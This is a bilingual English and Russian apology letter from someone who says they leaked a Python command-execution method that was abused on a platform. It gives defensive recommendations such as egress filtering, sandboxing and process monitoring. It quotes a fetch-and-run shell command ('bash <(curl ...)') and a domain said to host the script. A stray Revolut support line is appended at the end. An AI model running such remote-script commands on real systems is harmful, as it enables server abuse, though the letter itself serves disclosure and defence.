I am writing to take full responsibility for the recent wave of service abuse that has impacted your platform. I am the person who initiated this situation.
Initially, I discovered a method that allowed for arbitrary command execution using Python on your servers. Without considering the potential consequences, I shared this finding within an online community. I severely underestimated the impact this would have, and I never intended for it to lead to widespread malicious activity.
To mitigate any further damage, I have now deleted all the content I posted regarding this method. I want to express my deepest and most sincere apologies for the significant disruption and trouble this has caused.
In an effort to help you secure your platform and make amends, I am providing a detailed analysis of the exploit and a set of actionable recommendations to block this and similar attacks in the future.
Technical Analysis and Recommendations
The attack relies on the ability to download and execute a remote shell script from within a user’s process. The core command being used is: bash <(curl -Ls [REMOTE_SCRIPT_URL]).
Here are several layered defense strategies to prevent this:
Immediate Mitigation: Network Egress Filtering
This is the fastest way to stop the current attack.
Action:
Block Specific Domain: Use your firewall to block all outbound traffic to the domain main.ssss.nyc.mn.
Default Deny Policy (Best Practice): Block all outbound internet access by default and only whitelist essential domains. This prevents attackers from simply moving their script to a new domain.
Core Solution: Restrict the Execution Environment
This is the fundamental, long-term solution.
Action:
Disable Dangerous Functions: In your Python environment, disable dangerous modules like subprocess, os.system, os.popen, etc.
Use Secure Sandboxing: Run user code within a heavily restricted sandbox (e.g., Docker with strict seccomp and AppArmor/SELinux profiles, or technologies like gVisor). The process should run as a low-privilege, non-root user.
Detection and Monitoring
This allows you to detect and respond to threats in real-time.
Action:
Monitor Process Creation: Log and alert whenever a user’s process spawns a shell or network utility (e.g., /bin/bash, curl, wget).
Monitor Network Connections: Log all outbound connections and alert on traffic to suspicious or unknown destinations.
Summary of Recommendations
Strategy: 1. Network Filtering
Implementation Method: Firewall rules to block specific outbound domains/IPs.
Impact: Immediate. Stops the current attack vector.
Strategy: 2. Environment Hardening
Implementation Method: Disable dangerous functions, use sandboxing (Docker, gVisor).
Impact: Strategic. The most robust long-term solution.
Strategy: 3. Detection & Monitoring
Implementation Method: Log and alert on suspicious process/network activity.
Impact: Proactive. Provides visibility for rapid response.
I once again apologize for my irresponsible actions. I hope this technical information is useful for your team and helps you strengthen your platform’s security.
Sincerely,
Я пишу, чтобы взять на себя полную ответственность за недавнюю волну злоупотреблений сервисами, которая затронула вашу платформу. Я являюсь лицом, инициировавшим эту ситуацию.
Изначально я обнаружил метод, позволяющий выполнять произвольные команды с использованием Python на ваших серверах. Не оценивая возможные последствия, я поделился этим открытием в онлайн-сообществе. Я сильно недооценил последствия этого и никогда не подразумевал, что это приведет к широкому распространению вредоносной активности.
Чтобы минимизировать дальнейший ущерб, я удалил весь опубликованный мной контент, касающийся этого метода. Хочу принести свои глубочайшие и самые искренние извинения за значительные сбои и проблемы, которые это вызвало.
Чтобы помочь вам защитить вашу платформу и исправить ситуацию, я предоставляю подробный анализ эксплойта и набор практических рекомендаций по блокированию этой и подобных атак в будущем.
Технический анализ и рекомендации
Атака основана на возможности загрузки и выполнения удаленного скрипта оболочки из процесса пользователя. Основная используемая команда: bash <(curl -Ls [URL_УДАЛЁННОГО_СКРИПТ]).
Вот несколько многоуровневых стратегий защиты для предотвращения этого:
Немедленное смягчение: Фильтрация исходящего сетевого трафика
Это самый быстрый способ остановить текущую атаку.
Действие:
Блокировка определённого домена: Используйте брандмауэр для блокировки всего исходящего трафика в домен main.ssss.nyc.mn.
Политика запрета по умолчанию (рекомендуемая практика): Блокируйте весь исходящий интернет-доступ по умолчанию и добавляйте в белый список только необходимые домены. Это не позволит злоумышленникам просто перенести свой скрипт в новый домен.
Основное решение: Ограничьте среду выполнения
Это фундаментальное долгосрочное решение.
Действие:
Отключите опасные функции: В вашей среде Python отключите опасные модули, такие как subprocess, os.system, os.popen и т. д.
Используйте безопасную песочницу: запускайте пользовательский код в строго ограниченной песочнице (например, Docker со строгими профилями seccomp и AppArmor/SELinux, или такими технологиями, как gVisor). Процесс должен запускаться от имени пользователя с низкими привилегиями, не являющегося пользователем root.
Обнаружение и мониторинг
Это позволяет обнаруживать угрозы и реагировать на них в режиме реального времени.
Действие:
Мониторинг создания процессов: регистрируйте и оповещайте о каждом запуске пользовательским процессом оболочки или сетевой утилиты (например, /bin/bash, curl, wget).
Мониторинг сетевых подключений: регистрируйте все исходящие соединения и оповещайте о трафике, направленном на подозрительные или неизвестные адреса.
Резюме рекомендаций
Стратегия: 1. Фильтрация сети
Метод реализации: правила брандмауэра для блокировки определенных исходящих доменов/IP-адресов.
Воздействие: немедленное. Блокирует текущий вектор атаки.
Стратегия: 2. Укрепление среды
Метод реализации: Отключение опасных функций, использование изолированной среды (Docker, gVisor).
Воздействие: Стратегическое. Наиболее надёжное долгосрочное решение.
Стратегия: 3. Обнаружение и мониторинг
Метод реализации: Регистрация и оповещение о подозрительной активности процесса/сети.
Воздействие: Проактивное. Обеспечивает прозрачность для быстрого реагирования.
Ещё раз прошу прощения за свои безответственные действия. Надеюсь, эта техническая информация будет полезна вашей команде и поможет вам укрепить безопасность вашей платформы.
С уважением,
Здравствуйте! Нам очень жаль, что у вас возникли проблемы. В Revolut мы обязаны соблюдать определённые протоколы для обеспечения безопасности всех учётных записей клиентов.
